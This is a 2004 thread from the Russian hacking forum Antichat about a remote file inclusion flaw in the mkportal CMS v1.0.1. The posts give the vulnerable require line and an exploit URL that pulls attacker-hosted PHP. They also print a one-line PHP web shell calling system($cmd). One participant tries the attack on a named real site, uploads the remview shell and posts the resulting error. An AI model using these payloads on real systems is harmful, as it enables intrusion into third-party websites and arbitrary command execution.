ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Дыра в cms "mkportal" v1.0.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.07.2004, 00:39
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
внимание! в 1.0.1а это уже исправили

файл http://[target]/mkportal/include/driverf.php содержит
что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'>

эксплойт:
http://[target]/mkporta....TH=http

где:
http://[hacker_site]/conf_global.php
любой php код

http://www.google.ru/search?....%BA&lr=
 
Ответить с цитированием

  #2  
Старый 21.07.2004, 00:50
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
пхп-шная инъекция ?
Довольно частый случай:
http://www.site.ru/index.php&amp;se=сайт_с_кодом&amp;cmd=К оманды
 
Ответить с цитированием

  #3  
Старый 21.07.2004, 00:55
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Хотелось бы добавить, что &quot;сайтом с кодом&quot; может являться любой сайт на народе со страничкой следующего содержания:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<PRE>
<H4>
<? system($cmd); ?>
</H4>
</PRE>
[/QUOTE]<span id='postcolor'>
Н-р: http://www.shutnicok.narod.ru/xak.php
 
Ответить с цитированием

  #4  
Старый 21.07.2004, 01:11
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
кстати как видно из запроса в google
этот движок неплохо распостранился


интересно сколько на народе вот таких сайтов с загадочными файлами *.php =)
 
Ответить с цитированием

  #5  
Старый 11.10.2004, 19:06
Аватар для PhreakeR
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
Блин, пишет вот что:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'>
 
Ответить с цитированием

  #6  
Старый 11.10.2004, 19:16
Аватар для PhreakeR
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
А запрос делаю такой:
http://galassia.altervista.org/mkporta....TH=http
 
Ответить с цитированием

  #7  
Старый 11.10.2004, 19:28
Аватар для PhreakeR
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
и ещё я загрузил remview на narod и переименовал в conf_global.php
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ